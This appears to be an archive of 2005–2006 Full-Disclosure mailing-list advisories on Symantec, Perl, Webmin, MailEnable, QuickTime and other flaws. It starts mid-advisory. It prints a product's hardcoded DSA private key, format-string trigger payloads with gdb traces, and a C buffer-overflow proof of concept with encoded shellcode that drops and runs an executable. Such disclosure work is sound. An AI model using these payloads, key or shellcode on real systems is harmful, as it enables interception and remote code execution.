E97B788686921D991B3179F1E8CCA6491D3714F2F3EC2ADE399CB71A828090AF

   The first command resets the administrator password to 'foobar': it
   asks Scan Engine for the current administrator password hash
   (E97B...) for information purpose only (the attack does not actually
   require knowledge of the previous password hash), computes the hash
   corresponding to the new password (6562...), and uploads this new
   hash. The second command just restores the previous password (which
   is unknown) by re-uploading the previous hash (E97B...) to the
   server.

   Note: the 256-bit password hash is computed using the following
   algorithm. First, a random 128-bit salt is chosen. Second, a character
   string is built by concatenating the password string and the
   uppercase hexadecimal representation of the salt. Third, the 128-bit
   MD5 digest of this concatenated string is computed. Finally the
   256-bit password hash is built by concatenating the 128-bit MD5
   digest and the 128-bit salt.

6. Credit

   This vulnerability was discovered by Marc Bevand of Rapid7.

7. Contact Information

   Rapid7, LLC
   Email: [EMAIL PROTECTED]
   Web: http://www.rapid7.com
   Phone: +1 (617) 247-1717

8. Disclaimer and Copyright

   Rapid7, LLC is not responsible for the misuse of the information

[Full-disclosure] Rapid7 Advisory R7-0022: Symantec Scan Engine Known Immutable DSA Private Key

2006-04-24 Thread advisory
___
 Rapid7, LLC Security Advisory
___

Rapid7 Advisory R7-0022
Symantec Scan Engine Known Immutable DSA Private Key

   Published:  April 21, 2006
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0022.html

   CVE: CVE-2006-0231

1. Affected system(s):

   KNOWN VULNERABLE:
o Symantec Scan Engine v5.0.0.24

   KNOWN FIXED:
o Symantec Scan Engine v5.1.0.7

   UNKNOWN (PROBABLY VULNERABLE):
o All v5.0.x.x
o Earlier versions

2. Summary

   Symantec Scan Engine exhibits a vulnerability in the way it
   generates the SSL private key used for protecting communications
   over TCP port 8005. This port is used to exchange sensitive
   configuration and control commands between the server and the
   administrative control application.

   While all data over this port is protected using SSL, Rapid7 has
   found that every installation of Symantec Scan Engine uses the same
   private DSA key. This immutable key cannot be changed by end users
   and can be extracted easily from any installation of this product.

   This design flaw renders the SSL protection useless. A
   man-in-the-middle attacker could easily intercept and decrypt all
   communications between Symantec Scan Engine and an administrative
   client.

   NeXpose, Rapid7's award-winning vulnerability assessment platform,
   checks for this vulnerability and other vulnerabilities we have
   discovered in Symantec Scan Engine. Visit http://www.rapid7.com
   to register for a free demo of NeXpose.

3. Vendor status and information

   Symantec Corporation
   http://www.symantec.com

   Symantec was notified of this vulnerability on January 17, 2006.
   They acknowledged the vulnerability, then provided us with a
   fixed version. Rapid7's advisory was publicly released on April 21,
   2006.

4. Solution

   Upgrade to Symantec Scan Engine v5.1.0.7 or later.

5. Detailed analysis

   Symantec Scan Engine's administrative client exchanges sensitive
   configuration information with the server using a proprietary
   protocol protected by SSL which runs by default on TCP port 8005.
   This built-in SSL server is used, for example, to transmit the
   administrator password hash when changing the password. It is
   crucial for this communication channel to remain private,
   authenticated, and reliable.

   A critical design error has been made in the way SSL protection is
   employed. The use of a particular DSA private key, pre-generated by
   Symantec, is enforced in their SSL server in all tested versions of
   Symantec Scan Engine. End users are offered no way to change the key,
   and the key itself can be relatively easily extracted from any
   installation. The key can be found in the file servers.jar
   (located by default in C:\Program Files\Symantec\Scan Engine),
   which contains a java keystore file com/symantec/jsse/serverKeys
   protected by the password secret. The key entry is stored under
   the alias server and is protected by the password secret.

   This known immutable key renders SSL protection useless since the
   private key is known to anybody (see below for the key in PEM
   format). All Scan Engine installations use the same key. For example,
   attackers can combine ARP or DNS spoofing attacks with the knowledge
   of the private key to conduct man-in-the-middle attacks.

   -BEGIN DSA PRIVATE KEY-
   MIIBuwIBAAKBgQD9f1OBHXUSKVLfSpwu7OTn9hG3UjzvRADDHj+AtlEmaUVdQCJR
   +1k9jVj6v8X1ujD2y5tVbNeBO4AdNG/yZmC3a5lQpaSfn+gEexAiwk+7qdf+t8Yb
   +DtX58aophUPBPuD9tPFHsMCNVQTWhaRMvZ1864rYdcq7/IiAxmd0UgBxwIVAJdg
   UI8VIwvMspK5gqLrhAvwWBz1AoGBAPfhoIXWmz3ey7yrXDa4V7l5lK+7+jrqgvlX
   TAs9B4JnUVlXjrrUWU/mcQcQgYC0SRZxI+hMKBYTt88JMozIpuE8FnqLVHyNKOCj
   rh4rs6Z1kW6jfwv6ITVi8ftiegEkO8yk8b6oUZCJqIPf4VrlnwaSi2ZegHtVJWQB
   TDv+z0kqAoGAE9rKDKa4eOROFXX1/jy7sLH34OGTbTmsqYoEBTJt8DolJkr6L4kf
   SyOzpIhKB440mmXZMQJbXy0WNBCGzPjq6OHpI60KuBTskWAtPBEGE1jiov/7jK9b
   wCt6sTBqo3Ux5ygyjuFQyt89d+qTp9761Z32OvaBq+IJvZYWNM8M/2ECFDLgCI85
   fJtA3mlq9Q1T6U36Kl7x
   -END DSA PRIVATE KEY-

   The private component of this DSA key is X:

   X = 0x32e0088f397c9b40de696af50d53e94dfa2a5ef1

   A tool such as ssldump can be used to confirm the validity of the
   private key as shown above, by manually comparing its public part to
   the DSA public key embedded in the SSL server's certificate
   displayed by ssldump.

6. Credit

   This vulnerability was discovered by Marc Bevand of Rapid7.

7. Contact Information

   Rapid7, LLC
   Email: [EMAIL PROTECTED]
   Web: http://www.rapid7.com
   Phone: +1 (617) 247-1717

8. Disclaimer and Copyright

   Rapid7, LLC is not responsible for the misuse of the information
   provided in our security advisories. These advisories are a service
   to the professional security community. There are NO WARRANTIES with
   regard to this information. Any

[Full-disclosure] sendmail stuff

2006-03-23 Thread advisory
if anyone is playing with the sendmail bug stuff , here is what ive gotten thus 
far.

http://rapturesecurity.org/jack/exploiting_sendmail.html

if anyone has any luck i would like to hear about it :]

-- 
Jack
- [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [CIRT.DK] Apple QuickTime 7.0.3 and earlier - JPG/PICT Buffer Overflow

2006-01-11 Thread CIRT.DK Advisory
Title: [CIRT.DK] Apple QuickTime 7.0.3 and earlier - JPG/PICT Buffer Overflow






Apple Quicktime are vulnerable to a buffer overflow in the handling of .JPG/.PICT files


Read the full advisory http://www.cirt.dk/advisories/cirt-41-advisory.pdf




CIRT.DK



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] QUICKTIME vuln: Apple pulls a Microsoft stunt

2006-01-11 Thread CIRT.DK Advisory
Title: QUICKTIME vuln: Apple pulls a Microsoft stunt






Hey there


Just an update it seems that Apple uses the same developers as Microsoft


Apple QuickTime is still vulnerable:


Tested on MAC OS X and Windows Platform


Save the following file and open with QuickTime http://www.cirt.dk/tools/exploits/Apple_VS_MS.jpg you could change the name to Apple_VS_MS.pict





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Perl format string integer wrap vulnerability

2005-12-01 Thread advisory
SUMMARY. perl suffers from an integer wrap overflow inside the explicit
parameter format string functionality, this has been confirmed to be a
vector for remote code execution.

Date Found: September 23, 2005.
Public Release: TBD.
Application:perl
Credit: Jack Louis of Dyad Security

BACKGROUND.  perl is a cross-platform scripting language. for more
details see Perl.org

DESCRIPTION.  Value over INT_MAX(value of I) inside explicit parameter
format string (%I$n) causes integer wrap in the efix (32bit signed
integer) variable inside the function Perl_sv_vcatpvfn (see example 1)
(sv.c:~9360). Allowing for a write value anywhere in memory exploitation
vector (see example 2). Further, heap corruption itself is possible (see
example 3), as are more exotic non-reliable $PC redirection (see example
4). From what we have seen the first exploitation method is the only
valid one. ImmunitySec has found a generic method of controlling the
first condition with a good amount of robustness and success. Perl
itself is not directly vulnerable to remote attacks due to this flaw,
however any perl program with format string vulnerabilities is. The
vulnerability is not to limited DoS (as reported previously) but remote
code execution as well as information leakage and DoS.

IMPACT.  Perl itself is not generally impacted by this vulnerability,
but programs with format string vulnerabilities (Dyad Security has
confirmed that several programs available at this time have this
specific issue) can be vulnerable to remote code execution. Information
about creating a robust generic exploit is forthcoming, so public
knowledge of exploitation methods for this issue is in the cards.

AFFECTED VERSIONS.  Perl 5.9.2 and perl 5.8.6 have been tested and found
to be vulnerable on linux, freebsd, dragonflybsd on the ia32 platform.
It is assumed that a much larger range of software and platforms are
also affected, as the sv.c seems to remain seemingly static over time,
however this is not confirmed.

EXAMPLE 1.  
$ gdb myperl/bin/perl5.8.7
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as i686-pc-linux-gnu...Using host libthread_db 
library /lib/tls/libthread_db.so.1.

(gdb) break sv.c:9232
Breakpoint 1 at 0x80c0df0: file sv.c, line 9232.
(gdb) set args -e 'printf(%2147483647\$n);'
(gdb) run

Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180, pat=0x0, patlen=0, args=0x0, 
svargs=0x8133080,
svmax=0, maybe_tainted=0xbffb72cb ) at sv.c:9232
9232in sv.c
(gdb) p efix
$1 = 2147483647
(gdb) set args -e 'printf(%2147483648\$n);'
(gdb) run

Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180,
pat=0x8000 Address 0x8000 out of bounds, patlen=0, args=0x0, 
svargs=0x8133080,
svmax=0, maybe_tainted=0xbfb0640b ) at sv.c:9232
9232in sv.c
(gdb) p efix
$2 = -2147483648
(gdb) cont
Modification of a read-only value attempted at -e line 1.

Program exited with code 0377.
(gdb) set args -e 'printf(%2147483649\$n);'
(gdb) run

Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180,
pat=0x8001 Address 0x8001 out of bounds, patlen=0, args=0x0, 
svargs=0x8133080,
svmax=0, maybe_tainted=0xbfe69b9b ) at sv.c:9232
9232in sv.c
(gdb) p efix
$3 = -2147483647
(gdb) cont

Program received signal SIGSEGV, Segmentation fault.
Perl_sv_setiv (sv=0x0, i=0) at sv.c:1652
1652in sv.c
(gdb) bt
#0  Perl_sv_setiv (sv=0x0, i=0) at sv.c:1652
#1  0x080b6349 in Perl_sv_setuv_mg (sv=0x0, u=0) at sv.c:1743
#2  0x080c0e06 in Perl_sv_vcatpvfn (sv=0x812d180,
pat=0x8001 Address 0x8001 out of bounds, patlen=0, args=0x0, 
svargs=0x8133080,
svmax=0, maybe_tainted=0xbfe69b9b ) at sv.c:9232
#3  0x080e923b in Perl_do_sprintf (sv=0x812d180, len=1, sarg=0x813307c) at 
doop.c:713
#4  0x080de48a in Perl_pp_prtf () at pp_sys.c:1489
#5  0x080ad038 in Perl_runops_standard () at run.c:37
#6  0x080615c7 in S_run_body (oldscope=1) at perl.c:2000
#7  0x080613ff in perl_run (my_perl=0x812d008) at perl.c:1919
#8  0x0805e61f in main (argc=3, argv=0xbfe69da4, env=0xbfe69db4) at 
perlmain.c:98
(gdb) x/i $eip
0x80b61a8 Perl_sv_setiv+8:mov0x8(%ebx),%edx
(gdb) i r ebx edx
ebx0x0  0
edx0x812d180135451008
(gdb)

EXAMPLE 2.  
#0  Perl_sv_setiv (sv=0x815f821, i=0) at sv.c:2184
2184SvIVX(sv) = i;
(gdb) x/i $eip
0x80c815c Perl_sv_setiv+108:  mov%esi,0xc(%eax)

EXAMPLE 3.  
#0  0xb7e69fb0 in malloc_consolidate () from /lib/tls/libc.so.6

EXAMPLE 4.  
#0  0x09010e50 in ?? ()

FIXES.  Due to the information that has already been leaked we moved up
the release date of this advisory. There is no official fix for this
issue as of yet. We have provided a sample patch for the 5.9.2 version.

See http

[Full-disclosure] Webmin miniserv.pl format string vulnerability

2005-11-29 Thread advisory
SUMMARY.  The webmin `miniserv.pl' web server component is vulnerable to
a new class of exploitable (remote code) perl format string
vulnerabilities. During the login process it is possible to trigger this
vulnerability via a crafted username parameter containing format string
data. In the observed configuration the process was running as the user
root, so so if remote code execution is successful, it would lead to a
full remote root compromise in a standard configuration. A valid login
is not required to trigger this vulnerability, only access to the
miniserv.pl port (default 1).

Date Found: September 23, 2005.
Public Release: November 29, 2005.
Application:webmin miniserv.pl, all known versions
Credit: Jack Louis of Dyad Security

BACKGROUND.  miniserv.pl is a part of the webmin system administration
front end, written in perl by Jamie Cameron. more details are available
at http://www.webmin.com.

DESCRIPTION.  The username parameter of the login form is logged via the
perl `syslog' facility in an unsafe manner during a unknown user login
attempt. the perl syslog facility passes the username on to the variable
argument function sprintf that will treat any format specifiers and
process them accordingly.

DETAILS.  The vectors for a simple DoS of the web server are to use the
%n and %0(large number)d inside of the username parameter, with the
former causing a write protection fault within perl leading to script
abortion, and the latter causing a large amount of memory to be
allocated inside of the perl process.

A generic remote code execution exploit method has been developed by a
third party that is reachable though this hole itself.

The following is the section of code in question. (from miniserv.pl)

if ($use_syslog  !$validated) {
syslog(crit,
   ($nonexist ? Non-existent :
$expired ? Expired : Invalid).
login as $authuser from $acpthost);
}

As can be clearly seen with this section of code, the user supplied data
is clearly within the format specification of the syslog call.

Additional information and sample work around patches can be found at
http://www.dyadsecurity.com/webmin-0001.html

LEGAL NOTICES.  
Copyright (C) 2005 Dyad Security, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of Dyad Security, Inc. If you wish to reprint the whole
or any part of this alert in any other medium other than electronically,
please email [EMAIL PROTECTED] for permission.

DISCLAIMER.  The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [CIRT.DK] Ipswitch Whatsup small Business 2004 - Directory Traversal

2005-11-02 Thread CIRT.DK Advisory
Title: [CIRT.DK] Ipswitch Whatsup small Business 2004 - Directory Traversal 






Vendor: IpSwitch

Product: Ipswitch Whatsup small Business 2004 


Description:

The Whatsup Small Business 2004 are vulnerable to a directory traversal attack using ../ 



Read the full advisory at http://www.cirt.dk





CIRT.DK



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [CIRT.DK] - Novell ZENworks Patch Management Server 6.0.0.52 - SQL injection

2005-10-27 Thread CIRT.DK Advisory
The Novell ZENworks Patch Management Server 6.0.0.52 is vulnerable to 
SQL injection in the management console.

To being able to exploit this issue the administrator have to 
manually created a none-privileged account as minimum, to allow
exploitation.

Fix:
Upgrade to ZENworks Patch Management version 6.2.2.181
(or newer hot fix via your PLUS server) found at http://download.novell.com.

Note:   
The 6.0.0.52 CD ISO image was on the Novell download site up until the 2nd
week of September, 2005. 
The ZENworks Patch Management CD ISO image that is currently available at
the download site at the 
time of this document being published
http://download.novell.com/Download?buildid=5_kRStyf9wU~ 

ISO Name:   ZEN_PatchMgmt_Upd6.2.iso Size: 323.8 MB
(339607552) MD5: aeb244ecdf29c83cb8388fae1a6a1919 


A technical description of the vulnerability can be read at: 
http://www.cirt.dk



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] MailEnable W3C Logging Remote Buffer Overflow Proof of Concept

2005-10-07 Thread advisory
Attached is a proof of concept for the MailEnable W3C Logging
vulnerability. It features a special type of patching shellcode designed
to quickly and easily secure this vulnerability across your network.

I am releasing this in hopes that other POC writers will follow suit,
releasing exploits that patch the vulnerability rather then exploit it for
a malicious purpose. The reason this is being done is to support the admin
rather then to support the hacker./*
MailEnable W3C Logging Remote Buffer Overflow Proof of Concept

This is a pretty standard stack overflow with a SE handler overwrite.
The buffer used provides quite a bit of room for shellcode, so I've decided
to construct a shellcode that as far as I know hasn't been made. The 
shellcode provided will transport a 1008 byte win32 PE executable file. The 
shellcode
will then save it to disk, run the executable, and close the server. The 
executable will serve as a small patching tool, which will download the
patch provided by mailenable.com,unzip it, restart the service, and copy 
the patched exe. This shellcode will eliminate the very hole it used to gain
access. The old server executable will not be deleted, merely renamed to 
_MEIMAPS.exe. 

For those paranoid individuals who cannot read C code, YOUR-Address can be
anything as long as the length is the same as the real IP. If your IP is 
192.168.0.1, then 111.222.3.4 will work fine. We're only using it to 
calculate the length of the buffer for stack alignment. As you can see,
there is no call home code here :)

If you have any questions about this exploit, or how you may use it on 
your network to quickly patch your Mail Enable installations, please feel free 
to e-mail us
at [EMAIL PROTECTED]
*/

#include stdio.h
#include string.h
#include winsock.h

#pragma comment(lib,ws2_32)

long gimmeip(char *hostname);
void makeSpaceTaker(char *buff, int len);
char buffer[7300];
//Simple XOR'd 2-stage shellcode
//Some parts of this shellcode were taken from vlad902's toolset.
//Saves omg.exe to disk and runs.
char patchshell[]=
\xEB\x17\x31\xC0\x66\xB8\x02\x05\x8B\x34
\x24\x66\x81\x36\x1E\x17\x83\xC6\x02\x83
\xE8\x02\x75\xF3\xC3\xE8\xE4\xFF\xFF\xFF
\xE2\xFF\xFB\x17\x1E\x17\x48\x9C\x5B\x2B
\x95\x6B\x1B\x6F\x1F\xF8\x95\x58\x06\x9C
\x41\x37\x1F\xFC\xFD\x39\x57\x9C\x2A\x9C
\x1F\xF9\x2F\xD7\x87\xBB\x9A\xD7\x6A\x10
\xDF\xDD\x13\x16\xDC\xFC\xEA\x2C\x4A\x33
\x16\x62\xFD\x9C\x41\x33\x1F\xFC\x78\x9C
\x12\x5C\x95\x48\x02\x16\xF5\x9C\x02\x9C
\x1F\xFC\x40\xD4\x76\x61\x73\xA7\x5B\xE8
\xC8\x43\x41\x41\x76\x17\x1F\x17\x1E\x40
\x76\x17\x1E\x17\x1E\xE8\xCD\x49\x1F\xF7
\x56\x97\x26\x4B\x6B\xED\xD8\x17\x1E\x7F
\x51\x14\xD9\xA8\xE1\xC1\x44\x43\xE1\xC4
\x76\xB2\x09\x17\x62\xE8\xC8\x7F\x7B\x6F
\x7B\x17\x76\x78\x73\x70\x30\x9E\xFF\x41
\x74\x17\x74\x17\x74\x13\x74\x17\x74\x17
\x74\x15\x4F\xE8\xCD\x49\x4E\x7F\x01\x6E
\x14\xFF\xE1\xC1\x46\x4F\x48\x47\x74\x17
\xF5\x4B\x44\x45\x76\xE7\x1D\x17\x1E\x96
\xDC\x13\x1E\x17\x1E\x45\x4E\xE8\xCD\x7F
\xE5\x80\xE3\x18\xE1\xC1\x46\x4F\x48\x47
\xE1\xC4\x40\x7F\x60\xCF\xFC\x64\xE1\xC1
\x97\x0B\x3A\x7F\x86\xE9\x94\x19\xE1\xC1
\x47\x9E\xFF\x96\xDF\x1F\x1E\x17\x1E\x7D
\x1E\x46\xE1\xC4\xDD\x26\xE8\x73\x95\x61
\x06\xBA\xB3\x9C\x76\xF3\x53\x71\x2F\xFA
\x78\x96\x63\x17\x53\x4D\x6B\xE3\x40\xFE
\x5C\xE8\xE1\xE8\xF6\x88\xE1\xE8\xE1\x56
\x5C\x54\x5A\x5A\x44\x87\x1E\x14\x1E\x17
\x1E\x13\x1E\x17\x1E\xE8\xE1\x17\x1E\xAF
\x1E\x17\x1E\x17\x1E\x17\x1E\x57\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x97\x1E\x17\x1E\x19\x01\xAD
\x10\x17\xAA\x1E\xD3\x36\xA6\x16\x52\xDA
\x3F\x43\x76\x7E\x6D\x37\x6E\x65\x71\x70
\x6C\x76\x73\x37\x7D\x76\x70\x79\x71\x63
\x3E\x75\x7B\x37\x6C\x62\x70\x37\x77\x79
\x3E\x53\x51\x44\x3E\x7A\x71\x73\x7B\x39
\x13\x1A\x14\x33\x1E\x17\x1E\x17\x1E\x17
\x1E\x47\x5B\x17\x1E\x5B\x1F\x16\x1E\xCF
\x35\x2D\x5D\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\xF7\x1E\x18\x1F\x1C\x1F\x15\x2C\x47
\x1C\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x57\x1C\x17\x1E\xB7\x1F\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x57\x1E\x07\x1E\x17
\x1E\x07\x1E\x17\x1E\x13\x1E\x17\x1E\x17
\x1E\x17\x1E\x13\x1E\x17\x1E\x17\x1E\x17
\x1E\xE7\x1D\x17\x1E\xB7\x1F\x17\x1E\x17
\x1E\x17\x1E\x14\x1E\x17\x1E\x17\x1E\x07
\x1E\x17\x0E\x17\x1E\x17\x1E\x07\x1E\x17
\x0E\x17\x1E\x17\x1E\x17\x1E\x07\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x0F
\x1D\x17\x1E\x3F\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x77\x1D\x17
\x1E\x37\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x39
\x6A\x72\x66\x63\x1E\x17\x1E\x5F\x1C\x17
\x1E\xB7\x1F\x17\x1E\x47\x1C\x17\x1E\xB7
\x1F\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17

Re: [Full-disclosure] MailEnable W3C Logging Remote Buffer Overflow Proof of Concept

2005-10-07 Thread advisory
“We will patch you even if you want it or not ? :D”
 First and foremost, This POC was designed for use network administrators
on their own network. We never intended this to be converted into a bot
and spread. I can’t see how a bot that systematically disables its
victims would spread that well anyway. We are attempting to facilitate
the previously tedious job of patching multiple machines on a given
network. Only those with malicious intent should find annoyance in this
advisory.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [CIRT.DK - Advisory] Windows XP SP2 Local TFTP HEAP based Overflow

2005-10-03 Thread CIRT.DK Advisory
[Description]
The Windows XP tftp.exe software is vulnerable to a local Heap Based
overflow, 
allowing to run arbitrary commands on the system as the user issuing the
overflow.

[Complete advisory]
CIRT.DK Advisory 38 can be read at http://www.cirt.dk/

Regards
CIRT.DK

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [CIRT.DK - Advisory 37] TAC Vista Webstation 3.0 Directory Traversal bug in webinterface

2005-09-16 Thread CIRT.DK Advisory

TAC Vista is based on open technologies, TAC VistaR is one of the most
advanced software solutions for building automation. 
TAC Vista efficiently and economically controls, checks and analyzes all
building operations, allowing system operators to control and monitor entire
systems on site or from remote locations. 

The Web application is running on a Microsoft IIS 5.0 Server in this case. 

The problem is occurring in the input field of where the Template is called,
resulting in the possibility to traverse into other parts of the system.

Read the full Advisory at http://www.cirt.dk

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] 3 minor vulnerabilities in IPSwitch products

2005-09-09 Thread CIRT.DK Advisory
The following 3 minor vulnerabilities were found in the products Whatsup
Gold 8.04 and WhatsUp Small Business 2004

Ipswitch Whatsup Gold 8.04 - Access to view source code of all
files(CIRT-34-advisory)
Ipswitch Whatsup Gold 8.04 - Cross Site Scripting (CIRT-35-advisory)
Ipswitch Whatsup small Business 2004 - Source code disclosure
(CIRT-36-advisory)

Read the full advisories at http://www.cirt.dk




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [CIRT.DK - Advisory] Novell iManager 2.0.2 ASN.1 Parsing vulnerability in Apache module

2005-06-12 Thread CIRT.DK Advisory
ID: NOVL102200 
Domain: primus 
Solution Class: Novell 
Fact: Novell iManager 2.02 
Fact: Apache 2.0.48 
Fact: OpenSSL 0.9.7 
Symptom: OpenSSL ASN.1 Parsing vulnerability in Apache 
Symptom: Server stops responding and an error occurs 
Cause: Multiple vulnerabilities were reported in the ASN.1 parsing code in
OpenSSL. 
These issues could be exploited to cause a denial of service or to execute
arbitrary code. 

Fix: These vulnerabilites are corrected in OpenSSL 0.9.7d. 
iManager 2.5 ships with OpenSSL 0.9.7d - to resolve the vulnerability
upgrading is suggested.

Read the full advisory at http://www.cirt.dk


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/